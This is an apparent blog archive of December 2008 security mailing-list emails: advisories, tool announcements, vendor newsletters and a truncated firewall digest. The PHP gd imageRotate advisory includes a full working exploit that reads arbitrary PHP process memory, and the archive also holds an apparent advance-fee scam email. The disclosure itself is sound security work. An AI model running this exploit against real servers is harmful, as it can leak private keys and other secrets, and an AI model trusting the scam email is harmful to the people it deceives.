Search This Blog

Wednesday, December 31, 2008

Managing File Permissions on Windows Server: There's More Than Meets the Eye

File system access control is such a fundamental security activity one would think it would be pretty straightforward but it isn’t.  Permissions inheritance works different in each version of Windows and there are many ways you can inadvertently mismanage access control. Maintaining file permissions accurately, keeping them up-to-date and re-verifying such access is also problematic due to the lack of reporting capabilities in Windows.  

You must follow a number of best practices to avoid file access pitfalls and ensure a good outcome to audits and assessments.  There are few things more embarrassing that an auditor finding Joe in the mailroom with access to your financial reports or personnel data.  

In this real-training (tm) webinar I will help you avoid these mistakes. I’ll take you on a deep-dive on how file system permissions work including coverage of customized permissions, inheritance and the surprising differences between different versions of Windows.  I’ll also show you important best practices you should implement to ensure security, compliance and maintainability.  

You’ll also benefit from the brief demonstration of the sponsor product which which really helps with reducing costs of handling the issues I cover above.
 
CAN'T MAKE THE LIVE EVENT? REGISTER ANYWAY TO GET THE RECORDED VERSION.

Title: Managing File Permissions on Windows Server: There's More Than Meets the Eye
Date:Tuesday, January 27, 2009 12:00 PM - 1:00 PM EST

To make this webinar possible your registration data will be shared with our sponsor.

This is a real-training (tm) webinar.

Space is limited.
Reserve your Webinar seat now at: 
https://www2.gotomeeting.com/register/347860999

Thanks as always for reading and best wishes on security,
Randy Franklin Smith


Subscription Information
 
 
You can unsubscribe below but try fine-tuning what type of information I send you.  I have 5 different categories emails I send out - you can choose which to receive .

Ultimate Windows Security is a division of Monterey Technology Group, Inc. ©2006-2008 Monterey Technology Group, All rights reserved. You may forward this email in its entirety but all other rights reserved.

Disclaimer: We do our best to provide quality information and expert commentary but use all information at your own risk.

[UNIX] PHP gd Library imageRotate() Function Information Leak Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

PHP gd Library imageRotate() Function Information Leak Vulnerability
------------------------------------------------------------------------


SUMMARY

PHP is a popular web programming language which is normally used as a
script engine in the server side. PHP 5 which is compiled with gd library,
includes a function called imageRotate() for rotating an image resource by
giving the rotation angle. This function fills the resulted empty areas
with a given default coloring after rotation (clrBack).

Gd library works with both indexed images and truecolor images. A
truecolor pixel is a DWORD which stores the color value of the pixel which
would be displayed without any change. In indexed mode by using an index
with a size of no more than 1 byte, the data would be fetched from a
color palette which consists of parallel arrays of color bytes. The gd
library uses the same data strcture for both of these image types
(gdImageStruct). An implementation error in PHP's gd library can cause
information leakage from the memory of the PHP (or possible the web
server) process.

Information leak vulnerabilities allow access to e.g. the Apache memory
which might contain the private RSA key for the SSL cert. If an attacker
is able to read it he can perform real man in the middle attacks on all
SSL connections. Aside from this in the days of ASLR, NX and canary
protections it is often vital for the success of the exploit to know exact
memory addresses.

DETAILS

Vulnerable Systems:
* PHP version 5.2.8 with gd Library and the imageRotate function

The imageRotate() function does not perform any validation check on the
clrBack parameter which is used as an index for the above mentioned arrays
with the size of 255 in the index image type. A correct validation check
for the indexed images could be:

file: php-x.y.z/ext/gd/libgd/gd.c

3129: gdImagePtr gdImageRotate (gdImagePtr src, double dAngle,
int clrBack, int ignoretransparent)
3130:{
3131: gdImagePtr pMidImg;
3132: gdImagePtr rotatedImg;
3133:
3134: if (src == NULL) {
3135: return NULL;
3136: }
3137:+
3137:+ // Index check
3137:+ if (!src->truecolor)
3137:+ clrBack &= 0xff; // Just keep the first byte
3137:+
3138: if (!gdImageTrueColor(src) && clrBack>=gdImageColorsTotal(src)) {
3139: return NULL;
3140: }

While rotating indexed image, gd retrieves the final backcolor from 4
parallel arrays (red, green, blue and alpha) with length of 255 and uses
clrBack as the index of these arrays. By providing a special clrBack value
(more than 255) we can read almost any address in php memory:

file: php-x.y.z/ext/gd/libgd/gd.h

typedef struct gdImageStruct {

-- snip snip --

int red[gdMaxColors];
int green[gdMaxColors];
int blue[gdMaxColors];

-- snip snip --

int alpha[gdMaxColors];
/* Truecolor flag and pixels. New 2.0 fields appear here at the
end to minimize breakage of existing object code. */
int trueColor;

-- snip snip --

} gdImage;

typedef gdImage * gdImagePtr;

then uses gdTrueColorAlpha macro to combine the 4 mentioned values.
gdTrueColorAlpha macro is implemented as following:

file: php-x.y.z/ext/gd/libgd/gd.h

#define gdTrueColorAlpha(r, g, b, a) (((a) << 24) + \
((r) << 16) + \
((g) << 8) + \
(b))

The final color value is the output of gdTrueColorAlpha macro which will
be used as background color. gdTrueColorAlpha uses '+' (add) instead of
'&' (and). While the '+' operator is slower, it also causes a security
issue. By using a reverse function we can calculate almost any desired
memory address.

Proof of concept:
This script would cause a segmentation fault because -9999999 would result
in reading an invalid memory address in PHP process:
<?php

$img = imagecreate(5,5);
$tmp = imagerotate ($img,5,-9999999);

?>
Exploitation
We need to provide a good clrBack to imageRotate() and then calculate the
value of desired memory address by using imagecolorat() with arguments
concerned with angles of the rotated image. Upper right would be a good
spot (0, 0):
<?php
&special_index = /* index of the $address */
$r=imagecreate(300,300);
$gray = imagecolorallocate( $r, 111,111,111);
imagefilledrectangle($r,0,0,300,300,$gray);
$tmp =imagerotate( $r, 30, &special_index );
imagePng( $tmp, "test.png" );
?>

To read encoded memory values from a desired address, we have to use the
following script:
<?php

$address = /*address to read should be multiply of 4 */
$src = 0x84cde2c;
// depends on the image size and php script length but is constant
$index_b = -(int)(($src - $address + 0x810)/4);

$img = imagecreate(5,5);
$tmp = imagerotate ($img,5,$index_b);
$f_b = imagecolorat( $tmp,0,0);

?>

After passing $index_b as the index of arrays (red, green, blue and alpha
arrays) and rotating $img (so that the values from the memory would be
read), b variable takes the value of $address.
The color at [0,0] would be filled by back color, thus $f_b has the return
value of gdTrueColorAlpha function. All we need to do is decoding its
value. The final value of $f_b is calculated as following:
$f_b = gdTrueColorAlpha( M[$address-512],
M[$address-255],
M[$address+0],
M[$address+1034]);

These offsets [-512, -255, 0, 1034] are the displacements in
gdImageStruct's arrays.

Decoding $f_b
As you can see in the source code $f_b is calculated like this:

* We have used a special $index_b in order that b would have the value
of memory address at $address. All we need to do is extracting b from
$f_b. It is obvious that F1 has the exact value of B1( first byte of
memory at $address location). To extract B2 we must have G1 values and use
this equation: B2 = F2 G1.

* To calculate B3 and B4 we will also need G2, G3, R1, R2, A1. These
bytes values can also be grabbed by using imagerotate function and sending
special indexes other than $index_b. For more information see the comments
in exploit source code.

Exploit:
<?php
/*
edi = src
esi = clrBack ( -205923 for core_globals safe mode ( 0x IF APR SM MQS)
sample: 0x01 00 SM 00 )

(
zend_bool magic_quotes_sybase;
MQS
zend_bool safe_mode; SM
zend_bool allow_call_time_pass_reference; APR
zend_bool implicit_flush;
IF
)

0x080ed27f <php_gd_gdImageSkewX+1135>: mov 0x10(%edi,%esi,4),%ebx
mov ebx, [edi+esi*4+10]

test case:
edi = 0x084c6128
esi = 0xffee07b1(-1177679) values less than this will crash.
->
ebx = 0x8047ff6

if (a>127) {
a = 127;
}
:( since alpha blending is on by default, the 32th bit of dumped address
cant be detected.
*/
$debug = 0;
$address = hexdec($argv[1]);
$addressSave = $address;
$count = $argv[3]+1;
$mode = $argv[2];
$src = 0x84cde2c;
$s = 10; //image size

$GLOBALS["image"]=imagecreate($s,$s);
$r = $GLOBALS["image"];
if( $debug )
echo "Image created.\n";

function getDataFromImage( $index ) {
$tmp = imagerotate ($GLOBALS["image"],5,$index);
return imagecolorat( $tmp, 0,0);
}

$eor = 0;
while( $address < $addressSave+$count*4 ) {
// indexes
$index_b = (int)(($src - $address + 0x810)/4);
$index_g = $index_b + 256;
$index_r = $index_b + 512;
$index_a = $index_b - 1034;
//$index_gG is the same as index of r
$index_gR = $index_g + 512;
//$index_rG is the same as index of gR
//$index_gGg is the same as index of gR

// fuctions
$f_b = getDataFromImage( -$index_b );
$f_g = getDataFromImage( -$index_g );
$f_r = getDataFromImage( -$index_r );
$f_a = getDataFromImage( -$index_a );
$f_gR = getDataFromImage( -$index_gR );

/********************* Byte 1 **********************/

// b byte 1
$byte_b1 = $f_b & 0x000000ff;
if( $debug )
printf( "b:1-0x%x\n", $byte_b1 );

//g byte 1
$byte_g1 = $f_g & 0x000000ff;
if( $debug )
printf( "g:1-0x%x\n", $byte_g1 );

//r byte 1
$byte_r1 = $f_r& 0x000000ff;
if( $debug )
printf( "r:1-0x%x\n", $byte_r1 );

//a byte 1
$byte_a1 = $f_a & 0x000000ff;
if( $debug )
printf( "a:1-0x%x\n\n", $byte_a1 );

/* Relative */

// gG byte 1
// this is relative g to `g`( suppose that 'g' is a b). so its
right at the position of r.
$byte_gG1 = $byte_r1;

// gR byte 1
// this is relative r to `g`( suppose that 'g' is a b)
$byte_gR1 = $f_gR & 0x000000ff;

// rG byte 1
// this is relative g to r( suppose that 'r' is a b)
$byte_rG1 = $byte_gR1;

/* 2 Level Relative */

// gGg byte 1
// this is relative g to `gG`( suppose that 'gG' is a b)
$byte_gGg1 = $byte_gR1;

/********************* Byte 2 **********************/

// b byte 2
$sum_b2_g1 = (($f_b & 0x0000ff00) >> 8 );
$byte_b2 = $sum_b2_g1 - $byte_g1;
$borrow_b2 = 0;
if( $byte_b2 < 0 )
$borrow_b2 = 1;
$byte_b2 = $byte_b2 & 0x000000ff;
if( $debug )
printf( "b:2-0x%x \t0x%x\n", $byte_b2, $f_b );

// g byte 2
$sum_g2_gG1 = (($f_g & 0x0000ff00) >> 8 );
$byte_g2 = $sum_g2_gG1 - $byte_gG1;
$borrow_g2 = 0;
if( $byte_g2 < 0 )
$borrow_g2 = 1;
$byte_g2 = $byte_g2 & 0x000000ff;
if( $debug )
printf( "g:2-0x%x \t0x%x\n", $byte_g2, $f_gG1 );

// r byte 2
$sum_r2_rG1 = (($f_r& 0x0000ff00) >> 8 );
$byte_r2 = $sum_r2_rG1 - $byte_rG1;
$byte_r2 = $byte_r2 & 0x000000ff;
if( $debug )
printf( "r:2-0x%x \t0x%x\n\n", $byte_r2,
$sum_r2_rG1 );

/* Relative */

// gG byte 2
$byte_gG2 = $byte_r2;

/********************* Byte 3 **********************/

// b byte 3
$sum_b3_g2_r1_br2 = (($f_b & 0x00ff0000) >> 16 );
$sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2;
$sum_b3_g2 = $sum_b3_g2_r1 - $byte_r1;
$byte_b3 = $sum_b3_g2 - $byte_g2;
$borrow_b3 = 0;
if( $byte_b3 < 0 )
{
$borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; // for
borrows more than one
if( $debug )
printf( "\nborrow was: %d\n" ,
$borrow_b3 );
}
$byte_b3 = $byte_b3 & 0x000000ff;
if( $debug )
printf( "b:3-0x%x \t0x%x\n", $byte_b3, $sum_b3_g2
);

// g byte 3
$sum_g3_gG2_gR1_br2 = (($f_g & 0x00ff0000) >> 16 );
$sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2;
$sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1;
$byte_g3 = $sum_g3_gG2 - $byte_gG2;
$byte_g3 = $byte_g3 & 0x000000ff;
if( $debug ) {
printf( "f_g: 0x%x\n" , $f_g);
printf( "sum_g3_gG2_gR1_br2: 0x%x\n" ,
$sum_g3_gG2_gR1_br2 );
printf( "sum_g3_gG2_gR1: 0x%x\n" , $sum_g3_gG2_gR1
);
printf( "sum_g3_gG2: 0x%x\n" , $sum_g3_gG2 );
printf( "g:3-0x%x \t0x%x\n\n", $byte_g3,
$sum_b3_g2 );
}

/********************* Byte 4 **********************/

// b byte 4
$sum_b4_g3_r2_a1_br3 = (($f_b & 0xff000000) >> 24 );
$sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3;
$sum_b4_g3_r2 = $sum_b4_g3_r2_a1 - $byte_a1;
$sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2;
$byte_b4 = $sum_b4_g3 - $byte_g3;
$byte_b4 = $byte_b4 & 0x000000ff;
if( $debug ) {
printf( "f_b: 0x%x\n" , $f_b);
printf( "sum_b4_g3_r2_a1_br3: 0x%x\n" ,
$sum_b4_g3_r2_a1_br3 );
printf( "sum_b4_g3_r2_a1: 0x%x\n" ,
$sum_b4_g3_r2_a1 );
printf( "sum_b4_g3_r2: 0x%x\n" , $sum_b4_g3_r2 );
printf( "sum_b4_g3: 0x%x\n" , $sum_b4_g3 );
printf( "b:4-0x%x\n\n", $byte_b4);
}
/********************* Byte **********************/

if($mode == 0) { //text mode
printf( "%c%c%c%c", $byte_b1, $byte_b2, $byte_b3,
$byte_b4);
} elseif( $mode == 1) {
// b
if( !$eor )
printf( "0x%x:\t", $address );
printf(
"0x%x(%c)\t0x%x(%c)\t0x%x(%c)\t0x%x(%c)\t", $byte_b1, $byte_b1,

$byte_b2, $byte_b2,

$byte_b3, $byte_b3,

$byte_b4, $byte_b4 );

$eor = !$eor;
if( !$eor )
echo "\n";
} else {
$val = ($byte_b4 << 24) + ($byte_b3 << 16) +
($byte_b2 << 8) + $byte_b1;
printf( "0x%x: 0x%x\n", $address, $val );
}
$address+=4;
}
?>

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5498>
CVE-2008-5498


ADDITIONAL INFORMATION

The information has been provided by Hamid Ebadi.

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

InfoWorld's guide to the best mobile devices

InfoWorld

Wednesday, Dec 31, 2008

EDITOR'S NOTE

We've got a new InfoWorld Job Board. Get new alerts as they're posted. Check it out:

Click here. >>

InfoWorld's guide to the best mobile devices
Posted December 30, 03:00 a.m. Pacific Time

The iPhone started it, but everyone and his brother now seem to have a fancy smartphone on offer. If it's time to join the "mobile 2.0" generation, the InfoWorld Test Center can help you make the right choice. We've reviewed the new generation of mobile devices and sussed out their strengths and weaknesses.   >>



Cheap iPhones and fresh sliders
Posted December 29, 14:39 p.m. Pacific Time

Yes, yes, yes, I know. The iPhone went on sale at Wal-Mart yesterday. But not so fast! Sorry, Wal-Mart customers -- it's not $99. That would be the refurbished iPhones available to AT&T customers (at least until Dec. 31 or as long as supplies last).

The iPhones at Wal-Mart are going to run $197 for the 8GB model and $297 for the 16GB, which is still an accomplishment -- one that only the world's largest retail giant could shake out ...  >>



The mobile Web sucks, despite the iPhone
Posted December 29, 03:00 a.m. Pacific Time

The story: The Apple's iPhone 3G and apps from the App Store are so cool that everyone seems to forget that the mobile Web still, well, sucks. If we don't watch out, the Yellow Pages are going to make a comeback. The good news: Techies who really know how to develop will be in demand.   >>



More details of Sony's new laptop revealed
Posted December 29, 04:31 a.m. Pacific Time

Another day, another Sony laptop specification revealed? At the beginning of this week, Sony New Zealand began a teaser campaign for a new Vaio laptop. That was followed by Sony Japan on Wednesday, which offered a visual clue to the new machine, and Sony U.S. on Thursday apparently let the laptop's specifications out of the bag.   >>



Inside the perfect laptop
Posted December 25, 03:00 a.m. Pacific Time

It's fair to say that laptops have gotten boring. For years now, they've offered pretty much the same features and pretty much the same designs. Sure, there have been a few innovations such as Apple's multitouch trackpad, but mostly laptops have had just incremental improvements such as addi more media slots over time and replac USB 1.0 with USB 2 or FireWire 400 with FireWire 800.   >>



You are subscribed to infoworld_mobile_rpt as SECURITY.WORLD@gmail.com. To unsubscribe from infoworld_mobile_rpt, please click here
 
To unsubscribe from all InfoWorld newsletters, please click here           View our privacy policy       Register at InfoWorld.com       Advertise with us     
     
Copyright © 2008 InfoWorld Media Group. 501 Second St. San Francisco, CA 94017

[NT] Trend Micro HouseCall "notifyOnLoadNative()" Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Trend Micro HouseCall "notifyOnLoadNative()" Vulnerability
------------------------------------------------------------------------


SUMMARY

"Trend Micro HouseCall is an application for checking whether your
computer has been infected by viruses, spyware, or other malware.
HouseCall performs additional security checks to identify and fix
vulnerabilities to prevent reinfection." Secunia Research has discovered a
vulnerability in Trend Micro HouseCall, which can be exploited by
malicious people to compromise a user's system.

DETAILS

Vulnerable Systems:
* Trend Micro HouseCall ActiveX Control version 6.51.0.1028
* Trend Micro HouseCall ActiveX Control version 6.6.0.1278

Immune Systems:
* Trend Micro HouseCall ActiveX Control version 6.6.0.1285

The vulnerability is caused by a use-after-free error in the HouseCall
ActiveX control (Housecall_ActiveX.dll). This can be exploited to
dereference previously freed memory by tricking the user into opening a
web page containing a specially crafted "notifyOnLoadNative()" callback
function.

Successful exploitation allows execution of arbitrary code.

Solution:
Remove the ActiveX control and install version 6.6.0.1285 available from:
<http://prerelease.trendmicro-europe.com/hc66/launch/>
http://prerelease.trendmicro-europe.com/hc66/launch/

HouseCall Server Edition:
* Apply hot fix B1285.

Time Table:
25/08/2008 - Vendor notified.
26/08/2008 - Vendor response.
21/12/2008 - Public disclosure.

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2435>
CVE-2008-2435


ADDITIONAL INFORMATION

The information has been provided by Secunia Research.
The original article can be found at:
<http://secunia.com/secunia_research/2008-34/>
http://secunia.com/secunia_research/2008-34/

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

[NT] Citrix Broadcast Server login.asp SQL Injection

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Citrix Broadcast Server login.asp SQL Injection
------------------------------------------------------------------------


SUMMARY

The Citrix Broadcast Server administrative login page is vulnerable to
trivial SQL injections via the txtUID HTTP POST parameter. An attacker
could leverage this flaw to obtain unauthorized access to the web
interface or to extract data from the database via blind SQL injection.

DETAILS

Vulnerable Systems:
* Citrix Application Gateway Broadcast Server version 6.1
* Avaya AG250 Broadcast Server version 2.0

Solution Description:
Citrix has released a patch for this flaw as described in Document ID
<http://support.citrix.com/article/CTX119315> CTX119315.


ADDITIONAL INFORMATION

The information has been provided by Corey LeBleu and r@b13$.

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Drive business performance with Virtualization

Virtualization.
Agile. Efficient. Flexible. The IT infrastructure needs to be all these and then some—just what virtualization delivers. Virtualization is a proven engine that drives business performance. That's why for IT, virtualization is nothing short of mission-critical.  Check out these resources to learn more.

This week's feature item: Video: MLS Property Information Network saves big with virtualization and AMD Opteron processors
New England's largest home listing service receives up to 50,000 search requests an hour. For help handling all that traffic cost-effectively, the company turned to virtualization and Quad-Core AMD Opteron™ processors. The results? They're down from 60 servers to 25 and saving $20,000 a year on cooling alone. Learn more in this video case study.

More great resources for small and midsize business decision-makers:
• Two virtualization questions every SMB must answer: Don't roll out server virtualization before thinking through storage and disaster recovery.
• Getting started on green IT: Virtualize, virtualize, virtualize: In connection with a five-article series about how to launch a green IT strategy, we show you how virtualization can help lower your power usage.
• The virtual virtualization case study: This six-part "virtual" case study uses a fictional company's experiences to examine the key issues every organization should evaluate when planning and executing a virtualization deployment.

Plus, learn all about the new Quad-Core AMD Opteron processor. 1% Perspiration. 99% Virtualization.

Visit us regularly at www.accelerateresults.com. New content is available every week.

Also, be sure to sign up for our free magazine, which delivers in-depth reporting on technology and business performance four times a year.

www.accelerateresults.com/virtualization.html?source=nwwem

Sincerely,
Network World, Inc.

 

  

To unsubscribe, change your preferences, or change your e-mail address, go to the following URL:
http://optout.nww.com/nwwonline.aspx?emid=fy%2fmU7wupoHn0q7JFEHpdPr7bfGFXQ4iss%2b9rKvFX5A%3d  
If the above URL is not enabled as a link, please copy it in to your browser window to access our Preferences Page.

Read Network World's privacy policy at http://networkworld.com/tos.html  

Network World, Inc.
492 Old Connecticut Path
Framingham, MA 01701

[TOOL] FSpy - Linux Filesystem Activity Monitoring

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

FSpy - Linux Filesystem Activity Monitoring
------------------------------------------------------------------------


SUMMARY

DETAILS

FSpy is an easy to use linux filesystem activity monitoring tool which is
meant to be small, fast and to handle system resources conservative. You
can apply filters, use diffing and your own output format in order to get
the best results.


ADDITIONAL INFORMATION

The information has been provided by
<mailto:richard.sammet@googlemail.com> Richard Sammet.
To keep updated with the tool visit the project's homepage at:
<http://mytty.org/fspy/> http://mytty.org/fspy/

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Tuesday, December 30, 2008

How Secure are your Branch Offices?

Solve your branch office security problems with an affordable and easy to manage Unified Threat Management (UTM) appliance.

Branch Office UTM Implementation Guide
Click here to download this whitepaper

UTM is often thought of as an enterprise-class security strategy,  but there are platforms designed to effectively secure branch office sites.

Look for products that include:
     • A stateful inspection firewall
     • An intrusion Prevention System
     • Anti-malware based on Kaspersky Lab's scanning engine
     • Anti-spam technology
     • Web filtering
     • Denial of Service mitigation support

Also get tips and recommendations on deploying UTM on a small or large scale. Get all of the details today and better secure your branch offices with UTM.

https://www.accelacomm.com/jlp/Em_50117983_1231/7/50117983/


Sincerely,
Network World, Inc.

 

To unsubscribe, change your preferences, or change your e-mail address, go to the following URL:
http://optout.nww.com/nwwonline.aspx?emid=fy%2fmU7wupoHn0q7JFEHpdPr7bfGFXQ4iss%2b9rKvFX5A%3d  
If the above URL is not enabled as a link, please copy it in to your browser window to access our Preferences Page.

Read Network World's privacy policy at http://networkworld.com/tos.html  

Network World, Inc.
492 Old Connecticut Path
Framingham, MA 01701

PLEASE RESPOND TO US BECAUSE IS VERY IMPORTANT.

I have a new email address!
You can now email me at: patrickkolonga001@yahoo.ca

Hello Dear,


I, and my younger sister really need your help, Please is very urgent.


Thank's


- Patrick Kolonga

[TOOL] telnetrecon - Telnet Recon

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

telnetrecon - Telnet Recon
------------------------------------------------------------------------


SUMMARY

DETAILS

The telnetrecon project is doing some research in the field of telnet
server fingerprinting. The goal is the highly accurate identification of
given telnetd implementations. This is very important within professional
vulnerability analysis.

Besides the discussion of different approaches and the documentation of
gathered results also an implementation for automated analysis is
provided. This software shall improve the easyness and efficiency of this
kind of enumeration. The main approach is the fingerprinting of the telnet
options negotiation initiated by the server part. Some basic ideas of
application fingerprinting were discussed in the book "Die Kunst des
Penetration Testing" (Chapter 9, Application Fingerprinting,
<http://www.amazon.de/dp/3936546495/>
http://www.amazon.de/dp/3936546495/).

Telnet is a traditional tcp service which is served by default on port 23.
The initial specification is defined in RFC 854. Telnet stands for
terminal emulation over a network. This means an user will be able to
connect to a terminal remotely. This makes it possible to remote-conrol a
server within the command-line.

The given implementations rose the need for further possibilities. This
required the introduction of telnet options. The server and the client
should be able to negotiate which techniques and features should be used
and which should not. The negotiation of options are handled by the
keywords WILL, WONT, DO and DONT.

telnetrecon uses the following technique of fingerprinting the given
telnetd implementation. After connecting to a host the server responds
with the option demands and requests. These are dissected and compared to
the values within the fingerprinting database. As more matches could be
found as higher is the accuracy of the mapped fingerprint.

For example the following is the negotiaton the telnet server
implementation a Microsoft Windows XP sends back:
[nonprintable]

Those characters will be translated to their ASCII representation which is
easier to analyze and compare them. This will generate the following
fingerprint string:
255-253-37-255-251-255-251-255-253-92-39-255-253-255-253-255-251

The different demands are dissected by the IAC data byte 255. Then follows
the requirement. The first requirement is introduced with the symbol 253
which stands for the option code DO. The requirement itself is 37 which
stands for "Authentication Option" as it is discussed in RFC 2941.
Afterwards follows another 255 which introduces 251 which stands for the
option code WILL. This indicates the desire to begin performing, or
confirmation that you are now performing, the indicated option. And so on.

The currently known implementations of telnet fingerprinting, primarily
telnetfp by Team Teso, is using a strong identification mechanism. This
means the tool is gathering the telnet option negotiation and compare it
to the known strings. The identification is only successful if the
collected strings are identical. This is the easiest approach which does
not require real measurement of fingerprint hits.

However, this introduces the possibility of missing some partially known
implementations. For example if a well-known server has been configured to
announce RSA (authentication type 6) instead of KERBEROS_V5 (type 2). This
is the reason why telnetrecon uses a more modular approach which was
already introduced in httprecon (
<http://www.computec.ch/projekte/httprecon/>
http://www.computec.ch/projekte/httprecon/) and later in browserrecon (
<http://www.computec.ch/projekte/browserrecon/>
http://www.computec.ch/projekte/browserrecon/). The different negotiation
aspects are handled seperately. This makes it possible to provide the
accuracy of not exactly matching fingerprint scans.

The first release of telnetrecon is 0.1 which is not a major release
because many features are missing. Especially the fingerprint database is
very small and contain two example fingerprints only. Help to improve the
project and upload new fingerprints of known telnet daemons.


ADDITIONAL INFORMATION

The information has been provided by <mailto:marc.ruef@computec.ch> Marc
Ruef.
To keep updated with the tool visit the project's homepage at:
<http://www.computec.ch/projekte/telnetrecon/>
http://www.computec.ch/projekte/telnetrecon/

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

[TOOL] Zerowine Sandbox

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Zerowine Sandbox
------------------------------------------------------------------------


SUMMARY

DETAILS

Zero wine is a sandbox created with WINE and QEmu to (automatically)
analyze malware.

It's behavioral based: Just upload your malware to the zerowine's web
server and let it analyze the malware's behavior by running it (in a
isolated environment).

The very first release consist in a prebuilt QEmu virtual machine (the
recommended way) or the python source code (see the file INSTALL for
details).


ADDITIONAL INFORMATION

The information has been provided by <mailto:joxeankoret@yahoo.es> Joxean
Koret.
To keep updated with the tool visit the project's homepage at:
<http://sourceforge.net/projects/zerowine/>
http://sourceforge.net/projects/zerowine/

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Monday, December 29, 2008

firewall-wizards Digest, Vol 32, Issue 11

Send firewall-wizards mailing list submissions to
firewall-wizards@listserv.icsalabs.com

To subscribe or unsubscribe via the World Wide Web, visit
https://listserv.icsalabs.com/mailman/listinfo/firewall-wizards
or, via email, send a message with subject or body 'help' to
firewall-wizards-request@listserv.icsalabs.com

You can reach the person managing the list at
firewall-wizards-owner@listserv.icsalabs.com

When replying, please edit your Subject line so it is more specific
than "Re: Contents of firewall-wizards digest..."


Today's Topics:

1. Re: accessing SMTP server via the translated address
(Kevin Horvath)
2. LayerOne 2009 - Call For Papers (LayerOne Call For Papers)
3. Re: accessing SMTP server via the translated address
(Lucas Thompson)
4. Re: Windows dynamic ARP (Christoph Mayer)


----------------------------------------------------------------------

Message: 1
Date: Fri, 19 Dec 2008 10:19:24 -0500
From: "Kevin Horvath" <kevin.horvath@gmail.com>
Subject: Re: [fw-wiz] accessing SMTP server via the translated address
To: "Firewall Wizards Security Mailing List"
<firewall-wizards@listserv.icsalabs.com>
Message-ID:
<5c41be6e0812190719q5bda200fld77dd96829dadfce@mail.gmail.com>
Content-Type: text/plain; charset=UTF-8

Look into DNS doctoring with the static command and dns keyword.
Since, from what I understand, you are trying to access an internal IP
by its public DNS name then you will have to do this or split your DNS
(one for internal resolution and one for external). In the previous
trains of code this was done with the alias command. Hope this helps.

Kevin

On Fri, Dec 12, 2008 at 9:14 PM, Chris Myers <clmmacunix@charter.net> wrote:
> You cannot do it conventionally. The firewall sees it as a spoofed address.
> You cannot go out to the internet and back in the same interface for a
> stateful connection. The state table sees the packet out of state. Why do
> you want to go to the outside address, since you are on the same subnet? You
> should be accessing this from L2. I also would get your SMTP server to a DMZ
> and off your inside, as this is insecure. You are leaving your whole inside
> network open to attack if the SMTP server is compromised. You could get a
